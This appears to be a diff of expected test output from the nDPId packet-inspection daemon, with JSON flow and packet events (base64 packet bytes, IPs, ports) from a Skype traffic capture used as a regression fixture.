+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431970696322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696322,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkb9AAEAGQljAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+rmAAAAgQFtAEDAwUBAQgKPjJ2HwAAAAAEAgAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431970696915,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696915,"pkt":"0NQSxnP1PBXCt3IOCABFAABAStVAAEAGiULAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/qbAAAAgQFtAEDAwUBAQgKPjJ4bgAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1431970697334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970697334,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+HkAAEARZmnAqAEirjGr4DLdfQsAGpXefcACJf2u8qgkatcYbdd0gE\/+"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1431970697334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970697334,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuk3UAAEARxbPAqAEiUx8MrTLdXYMAGjJQfcIC\/PmkO\/ZLL41O1l2CVTPo"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697478,"flow_last_seen":1431970697478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697478,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431970697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697478,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/r1AAEAGxRPAqAEilQ0gD8hrNFBkkG+ZAAAAALAC\/\/82XwAAAgQFtAEDAwUBAQgKPjJ6nwAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431970697521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970697521,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGvw2U4ZZJBvmqASOJDuMgAAAgQFrAQCCAo\/iaIXPjJ6nwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431970698661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698661,"pkt":"0NQSxnP1PBXCt3IOCABFAABAL8NAAEAGlA7AqAEilQ0gD8htNFBZKlAPAAAAALAC\/\/9ctAAAAgQFtAEDAwUBAQgKPjJ\/OAAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431970698714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970698714,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyG0MzUGLWSpQEKASOJAD+QAAAgQFrAQCCAo\/iaNBPjJ\/OAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431970698714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970698714,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OGtAAEAGi3LAqAEilQ0gD8htNFBZKlAQDM1BjIAQECxa7wAAAQEICj4yf2w\/iaNB"} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431970699535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699535,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1tBAAEAG\/UbAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9X8gAAAgQFtAEDAwUBAQgKPjKCnAAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970699896,"flow_last_seen":1431970699896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970699896,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431970699896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699896,"pkt":"0NQSxnP1PBXCt3IOCABFAABAq+JAAEAGjwvAqAEiXU\/gsMhvOKrhhkW1AAAAALAC\/\/9MqQAAAgQFtAEDAwUBAQgKPjKEAQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431970699988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970699988,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyG99aSIL4YZFtqASOJC3HAAAAgQFrAQCCAoANM5PPjKEAQEDAwU="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431970699988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970699988,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MxRAAEAGB+bAqAEiXU\/gsMhvOKrhhkW2fWkiDIAQECwN6AAAAQEICj4yhFwANM5P"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970700273,"flow_last_seen":1431970700273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970700273,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431970701508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701508,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+6xAAEAGP0HAqAEiXU\/gsMhyOKrDZAILAAAAALAC\/\/+oNwAAAgQFtAEDAwUBAQgKPjKKPAAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431970701535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701535,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHGqbrB+XHkM86ASOJCJjwAAAgQFrAQCCAo\/pB5HPjKKDQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431970701535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701535,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GjJAAEAGggLAqAEi1KEIJMhxNFBceQzzqm6wf4AQECzgbwAAAQEICj4yilc\/pB5H"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431970701599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701599,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyHKomFMrw2QCDKASOJC0yAAAAgQFrAQCCAoANM\/iPjKKPAEDAwU="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431970701599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701599,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03YRAAEAGXXXAqAEiXU\/gsMhyOKrDZAIMqJhTLIAQECwLlgAAAQEICj4yipUANM\/i"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970703073,"flow_last_seen":1431970703073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970703073,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431970704371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970704371,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+SJAAEAGyrrAqAEilQ0gD8h0NFB7qA8DDQLVPIAQECyMewAAAQEICj4ylU0\/gOZ\/"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970705942,"flow_last_seen":1431970705942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970705942,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} 